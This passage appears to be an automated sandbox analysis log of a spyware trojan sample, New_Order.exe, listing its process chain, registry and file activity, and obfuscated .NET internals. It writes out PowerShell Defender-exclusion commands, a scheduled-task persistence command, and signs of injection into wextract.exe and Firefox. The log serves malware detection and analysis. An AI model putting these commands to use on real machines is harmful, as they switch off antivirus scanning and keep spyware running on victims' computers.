            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeProcess created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exe
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeProcess created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exe
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmpJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeProcess created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exeJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeProcess created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exe
            Source: C:\Users\user\Desktop\New_Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeFile created: C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeFile created: C:\Users\user\AppData\Local\Temp\tmpBC11.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/16@12/9
            Source: C:\Users\user\Desktop\New_Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: 11.2.QjSljS.exe.2495610.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.New_Order.exe.2b16bac.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.New_Order.exe.2b1abc4.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, bqmxolvPvPxiKNnaj2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: _0020.SetAccessControl
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, bqmxolvPvPxiKNnaj2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, bqmxolvPvPxiKNnaj2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: New_Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\New_Order.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeMutant created: \Sessions\1\BaseNamedObjects\ZqnrGkOmbbnQafkKZLHEG
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New_Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: New_Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New_Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: New_Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: firefox.pdbP source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wextract.pdb source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165809327.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, QjSljS.exe, 00000012.00000002.1907867203.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000002.4165108580.0000000000688000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JkC.pdbSHA256 source: New_Order.exe, QjSljS.exe.0.dr
            Source: Binary string: wextract.pdbGCTL source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165809327.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, QjSljS.exe, 00000012.00000002.1907867203.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000002.4165108580.0000000000688000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JkC.pdb source: New_Order.exe, QjSljS.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165599306.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816147347.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4165740008.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.000000000524E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1845191923.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1853417520.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.000000000497E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1908946698.0000000004638000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1906920518.000000000448A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New_Order.exe, New_Order.exe, 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.000000000524E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1845191923.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1853417520.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.000000000497E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1908946698.0000000004638000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1906920518.000000000448A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.cs.Net Code: sCK2rvLeLm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.cs.Net Code: sCK2rvLeLm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.5500000.4.raw.unpack, -Module-.cs.Net Code: _206C_206F_200B_202D_202C_200C_206B_206D_206B_200F_200C_200D_202E_200C_200F_202C_202C_202E_206D_202D_202C_202E_202B_206A_202A_206F_206D_202D_200B_200E_206B_200B_206E_200F_202A_206A_206E_200D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.5500000.4.raw.unpack, QuickSort.cs.Net Code: _206B_200F_202C_202A_206B_202B_206A_202C_206C_200D_202C_200E_202D_200C_202C_206D_202C_202E_206B_200B_202B_206C_200F_206E_200E_206E_200F_206E_200B_202B_202D_206F_202D_200D_200C_200E_206E_202C_206D_202B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.2af6120.2.raw.unpack, -Module-.cs.Net Code: _206C_206F_200B_202D_202C_200C_206B_206D_206B_200F_200C_200D_202E_200C_200F_202C_202C_202E_206D_202D_202C_202E_202B_206A_202A_206F_206D_202D_200B_200E_206B_200B_206E_200F_202A_206A_206E_200D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.2af6120.2.raw.unpack, QuickSort.cs.Net Code: _206B_200F_202C_202A_206B_202B_206A_202C_206C_200D_202C_200E_202D_200C_202C_206D_202C_202E_206B_200B_202B_206C_200F_206E_200E_206E_200F_206E_200B_202B_202D_206F_202D_200D_200C_200E_206E_202C_206D_202B_202E System.Reflection.Assembly.Load(byte[])
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.cs.Net Code: sCK2rvLeLm System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0DF0BA6D push FFFFFF8Bh; iretd 0_2_0DF0BA6F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004120E1 push esi; ret 10_2_004120E4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00414206 push ds; ret 10_2_00414207
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004182DC push ebp; iretd 10_2_004182E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00419B4A push es; iretd 10_2_00419B4B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0041ABE4 push ds; retf 10_2_0041ABE6
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004033F0 push eax; ret 10_2_004033F2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0042B5C2 push eax; ret 10_2_0042B5C4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00422D83 push cs; ret 10_2_00422E7C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0041AD80 push edx; retf 10_2_0041AD81
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00413DAE push es; ret 10_2_00413DBA
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00419E15 push esi; retf 10_2_00419E31
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0041AEC5 push edi; ret 10_2_0041AEC9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00404FFB push ss; retf 10_2_00404FFF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004177B2 push edi; iretd 10_2_004177B3
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012809AD push ecx; mov dword ptr [esp], ecx10_2_012809B6
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 11_2_022BB265 push FFFFFF8Bh; iretd 11_2_022BB267
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147C06D push edi; ret 18_2_0147C06F
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0140135E push eax; iretd 18_2_01401369
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147C54F push 8B014067h; ret 18_2_0147C554
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147C54D pushfd ; ret 18_2_0147C54E
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147C9D7 push edi; ret 18_2_0147C9D9
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_014309AD push ecx; mov dword ptr [esp], ecx18_2_014309B6
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147BF38 push edi; ret 18_2_0147BF3A
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01401FEC push eax; iretd 18_2_01401FED
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01480E7F push edi; ret 18_2_01480E81
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147BECE push edi; ret 18_2_0147BEE0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147BEAD push edi; ret 18_2_0147BEAF
            Source: New_Order.exeStatic PE information: 0xA541C5EC [Fri Nov 9 17:05:48 2057 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 7.880750053581327
            Source: initial sampleStatic PE information: section name: .text entropy: 7.880750053581327
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, DGgk8FJ1T9SQqJsR4v.csHigh entropy of concatenated method names: 'UJToeKKvdW', 'BidobkwfF9', 'HE2ocB9loE', 'rJ3otoiyIJ', 'lDUo12bNxK', 'cIZoBLICZT', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, bqmxolvPvPxiKNnaj2.csHigh entropy of concatenated method names: 'yPV81Xq4XY', 'N0y893QaIj', 'xt8851VtdI', 'L4p8022f60', 'oeD8MXmyV8', 'NDE8ODFEEY', 'sGR8VQtYLW', 'MYG8HWt0YJ', 'P5t8nW4cEC', 'P688s6qKaW'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, DLCQ6qWPZ2npD2VK97c.csHigh entropy of concatenated method names: 'treGy1qibf', 'ybyGipLFXf', 'FRXGrUuCHE', 'vJjGFdmBGe', 'rt2GTs4Svq', 'sxnGKddxxe', 'e2NG3HvVJV', 'yDOGdnnM7D', 'I5tGD4QLqR', 'W5hGNoiLW7'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, RsTPbKup2wq6YN65MQ.csHigh entropy of concatenated method names: 'OARYyxs9pg', 'gxhYi9vy10', 'RZUYrSRsHs', 'Gr2YFf1U75', 'qKBYT1vriX', 'VM9YK8sSkT', 'UvGY3x8yNV', 'VJIYd22uft', 'dJKYDOHfJM', 'SaxYNRkcHV'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, goEE1epI6dHkIrNF1v.csHigh entropy of concatenated method names: 'XTEuFmx9Gb', 'JFRuK63C7a', 'HI1udFDKVp', 'F9nuDf9049', 'CvouqmoXL7', 'OixuS82yXG', 'R4buIQkajT', 'oFTuoWowAT', 'f04uGGZ1vl', 'GhYuX2CwSK'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, oeaCEEWWlgoouEcLVPL.csHigh entropy of concatenated method names: 'ToString', 'nyWXRQDjhG', 'jmNX2aoZlN', 'd0SXJAjbJi', 'W93XwxKtpT', 'gZ8X8DaWW5', 'GToXu4hwH8', 'rq6XvqSN7t', 'ILg4krFXyPmSfIU5At6', 'uXdIpvFJ1AskUOf5PPn'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, JPthFlW7Vq61JKub2YN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P4BX1wbtLb', 'E1nX9T8Hmy', 'xpKX5b1Si2', 'vpXX0D8hq7', 'p93XMJhcac', 'zUNXOkAOp7', 'tqVXVVrLxa'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.csHigh entropy of concatenated method names: 'YDrRJRnu0B', 'X6IRwrbMju', 'u9ZR8MZ1Ml', 'LLcRupR7h1', 'he4RvtlTAJ', 't0lRpGrvc5', 'smiRYy0oob', 'upgRf5cVvv', 'UmxRhZpiVC', 'M6ZREG6lk6'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, kycsHry1MAvVD8x7AF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HF3lnuYxld', 'N28lsw2m82', 'xM5lzqVlEg', 'DlnR73njkh', 'oIwRaEZ37C', 'llPRlDA8mK', 'LtpRRjuH9D', 'ElSrrCsFPAokaWPooEy'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, BGayaGs6fsYETrsyVi.csHigh entropy of concatenated method names: 'futow8K3Ls', 'aqao8D1Hop', 'gblousriNU', 'vDrovws9PO', 'MSrop4uEJA', 'PJroYtnjRy', 'UYCofkXlpx', 'J31ohuGTBQ', 'CiSoEQOWWu', 'CO3o6Qs2PE'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, PpqMW0zQO4To1KIirG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BgIGmiWxxW', 'nCHGqVU4qu', 'zC1GSdTMAO', 'flmGIaJtaM', 'IgvGo8kAwL', 'reDGGDp0ZO', 'xn5GXIMZFf'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, uCptQ5ciPt496xv8vt.csHigh entropy of concatenated method names: 'hXbmdjRLTZ', 'yLtmDl9cEE', 'gB2meKIsbO', 'HCImbjoe6h', 'XZomtcHPFX', 'ID0mB1dPVp', 'MyamUFE7Jt', 'vAxmCAcqip', 'aYlmPKnbgx', 'kQemkKFAkH'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, cjohpB6F4qCJl6on6W.csHigh entropy of concatenated method names: 'lA5pJS0LRu', 'hp1p8Nc1Y1', 'fsupvEAD5k', 'RBWpY7y6rk', 'zlxpfcA3CU', 'nfQvMGS2sX', 'BJ2vOsaSYN', 'yNJvVUXcUU', 'S90vHDT8jx', 'Sv9vnpBcqK'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, JVlQPXD8IYlAL4iUQc.csHigh entropy of concatenated method names: 'Dv4rraFNn', 'voPFbtwdW', 'UvVK9qeR6', 'pUj3cI0NO', 'D9kD5xJkY', 'O1JNps6W5', 'CO3ClfVCm0X4UvJSFV', 'B1lVClm1YRM0DhwkwZ', 'uqtowpqGY', 'd9cXWQAwm'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, oNamifxUxiguxbJyhK.csHigh entropy of concatenated method names: 'M7HYwJF8wf', 'CXeYu4WbND', 'Kt3YpiVxwE', 'biNpsudPdY', 'wQkpzerklC', 'xJcY7yTeWp', 'a8wYanoCau', 'owCYlubRUO', 'vasYRhg7RU', 'iJIY2vClc1'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, mrtCjLogu3Q1DWWwjP.csHigh entropy of concatenated method names: 'oJgIE74c2n', 'dPBI6bi5Kl', 'ToString', 'LSbIw7Ilmu', 'kOcI85YsXH', 'f1ZIujjvZ8', 'cb7IvIInwh', 'Y9IIpqIucv', 'D0BIY8N37O', 'xk7IfDZZuK'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, vSFpnK0N05eGXfNOef.csHigh entropy of concatenated method names: 'HX3pxMP5h8', 'PEXpyGFJvK', 'qg8prGTofX', 'eGIpFg4gDq', 'KVUpKtpNLJ', 'OoQp3oN4cK', 'APApDcmgNA', 'Sq7pNw0wTr', 'EfaqlWf56atJmatGjZ3', 'uClRYDfnAyy9x8GicqC'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, W9P0rCRK819M9K77jS.csHigh entropy of concatenated method names: 'Dispose', 'h5tanb8iRa', 'Naclbva9MO', 'kvs449HdxN', 'D29aslHuZN', 'G84azrVM1e', 'ProcessDialogKey', 'oRvl7OJx5o', 'KWBlaRcPNf', 'JDhllRbWCX'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, BeOUOrEKdOwVEsyIEg.csHigh entropy of concatenated method names: 'pPZIHgfWY1', 'j1LIsDDJKP', 'DEbo7qDIyL', 'MUGoaO3rcN', 'KuaIkEnrW0', 'Uu5ILUB6Ib', 'CmuIggg5Be', 'ydTI12Wknx', 'DQkI9YtWMT', 'XPJI5DwhHd'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, gHsRsfwrrRYNVGAThQ.csHigh entropy of concatenated method names: 'G5xGadhA9l', 'EGQGR8ZBAV', 'iHZG2Rjf7J', 'P3eGwwRrkN', 'qRUG8OpZH7', 'BFFGvNnmIQ', 'p5CGp9Gf0Z', 'Sx9oVG3SXw', 'm7KoHNDPR3', 'nZbon2AbM1'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, WragX5NZaA88Oi9VWc.csHigh entropy of concatenated method names: 'Af0aY7nb5N', 'kvXafHCpZk', 'Yf5aEO4LIh', 'foYa69bYyr', 'LssaqW0eSE', 'sJJaSthxW4', 'RFGX6EHma6QWE0w37B', 'xWhoi4QRg1w5CD4DcA', 'WNeaaZ87kA', 'XpqaRYAnpp'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, w9NgRwSLiBUB45BpqD.csHigh entropy of concatenated method names: 'I2vvTrK7Po', 'oGZv3A877E', 'CqPucmIBNk', 'z3IutLtYlJ', 'hh9uB1DfBi', 'WjCuQ6sOgy', 'hGRuUllgEJ', 'RCnuCW6kcn', 'm7oujmBNnt', 'E5nuPJvjrL'
